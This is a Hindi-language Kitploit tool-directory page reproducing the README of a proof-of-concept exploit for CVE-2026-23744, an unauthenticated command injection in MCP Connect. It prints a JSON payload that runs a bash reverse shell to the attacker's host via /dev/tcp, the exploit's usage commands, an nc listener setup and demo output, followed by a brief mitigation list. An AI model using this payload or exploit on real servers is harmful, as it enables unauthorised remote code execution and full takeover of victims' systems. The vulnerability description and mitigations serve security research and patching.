Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23744 — CVE-2026-23744 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो MCP Connect में एक अनप्रमाणित कमांड इंजेक्शन है, जिससे रिमोट कोड निष्पादन और रिवर्स शेल प्राप्त होता है। | Kitploit
उपकरण/GitHubGitHub/cylock11/cve-2026-23744
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubcylock11/cve-2026-23744

CVE-2026-23744

CVE-2026-23744 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो MCP Connect में एक अनप्रमाणित कमांड इंजेक्शन है, जिससे रिमोट कोड निष्पादन और रिवर्स शेल प्राप्त होता है।

रिपॉजिटरी देखें
55 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23744 — MCP Connect RCE via Unauthenticated Command Injection

Python Category Type License

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। बिना स्पष्ट प्राधिकरण के सिस्टम के विरुद्ध इस एक्सप्लॉइट का उपयोग अवैध है। लेखक इस कोड के दुरुपयोग के लिए जिम्मेदार नहीं है।


📌 भेद्यता का विवरण

यह भेद्यता /api/mcp/connect एंडपॉइंट में मौजूद है, जो एक अनधिकृत हमलावर को दुर्भावनापूर्ण कॉन्फ़िगरेशन के साथ एक मनमाना MCP (Model Context Protocol) सर्वर पंजीकृत करने की अनुमति देता है। command फ़ील्ड और उसके args पर कोई सत्यापन या सैनिटाइज़ेशन न होने के कारण, ऑपरेटिंग सिस्टम कमांड इंजेक्ट करना संभव है जो वेब प्रक्रिया के विशेषाधिकारों के साथ सीधे सर्वर पर निष्पादित होते हैं।

इसके परिणामस्वरूप रिमोट कोड निष्पादन (RCE) होता है जिसका उपयोग समझौता किए गए सिस्टम पर रिवर्स शेल प्राप्त करने के लिए किया जा सकता है।


🧠 तकनीकी विवरण

फ़ील्डविवरण
प्रकारRemote Code Execution (RCE)
वेक्टरनेटवर्क (बिना प्रमाणीकरण के HTTP POST)
एंडपॉइंट/api/mcp/connect
गंभीरता🔴 क्रिटिकल
प्रमाणीकरणआवश्यक नहीं
प्रभावसर्वर पर पूर्ण नियंत्रण

दुर्भावनापूर्ण पेलोड

root@kitploit:~
{
  "serverId": "shell1",
  "serverConfig": {
    "command": "bash",
    "args": ["-c", "bash -i >& /dev/tcp/<LHOST>/443 0>&1"],
    "env": {}
  }
}

सर्वर इस कॉन्फ़िगरेशन को संसाधित करता है और प्रदान किए गए तर्कों के साथ bash कमांड को लागू करता है, जिससे हमलावर की ओर एक रिवर्स TCP कनेक्शन स्थापित होता है।


🛠️ आवश्यकताएँ

  • Python 3.x
  • निम्नलिखित लाइब्रेरीज़:
root@kitploit:~
pip install requests termcolor

🚀 उपयोग

root@kitploit:~
python3 exploit.py -l <TU_IP> -u <URL_OBJETIVO>

पैरामीटर

पैरामीटरविवरणउदाहरण
-lआपका IP (जहाँ आप शेल प्राप्त करेंगे)192.168.1.50
-uलक्ष्य का आधार URLhttps://victim.com

पूर्ण उदाहरण

टर्मिनल 1 — लिसनर:

root@kitploit:~
nc -nlvp 443

टर्मिनल 2 — एक्सप्लॉइट:

root@kitploit:~
python3 exploit.py -l 192.168.1.50 -u https://victim.com

🎬 डेमो

root@kitploit:~
[-] Please, execute the following command in another terminal:

[+] nc -nlvp 443

[-] Press 'Enter' when the command has been executed...

[+] Sending attack request...

एक बार अनुरोध भेजे जाने के बाद, पोर्ट 443 पर लिसनर समझौता किए गए सर्वर की इंटरैक्टिव शेल के साथ रिवर्स कनेक्शन प्राप्त करेगा।


🛡️ शमन

  • /api/mcp/connect में बॉडी के सभी फ़ील्ड को संसाधित करने से पहले सत्यापित और सैनिटाइज़ करें।
  • एंडपॉइंट को प्रमाणित करें और इसकी पहुँच केवल विशेषाधिकार प्राप्त उपयोगकर्ताओं तक सीमित करें।
  • उपयोगकर्ता इनपुट से सीधे सिस्टम कमांड कभी निष्पादित न करें।
  • अनुमत कमांड की व्हाइटलिस्ट लागू करें।
  • वेब सर्वर प्रक्रिया पर न्यूनतम विशेषाधिकार का सिद्धांत लागू करें।

📁 रिपॉजिटरी संरचना

root@kitploit:~
.
├── exploit.py       # एक्सप्लॉइट का मुख्य स्क्रिप्ट
└── README.md        # यह फ़ाइल

👤 लेखक

आक्रामक सुरक्षा अनुसंधान उद्देश्यों के लिए Jorge Arana Fedriani द्वारा विकसित।

टूल डाउनलोड करें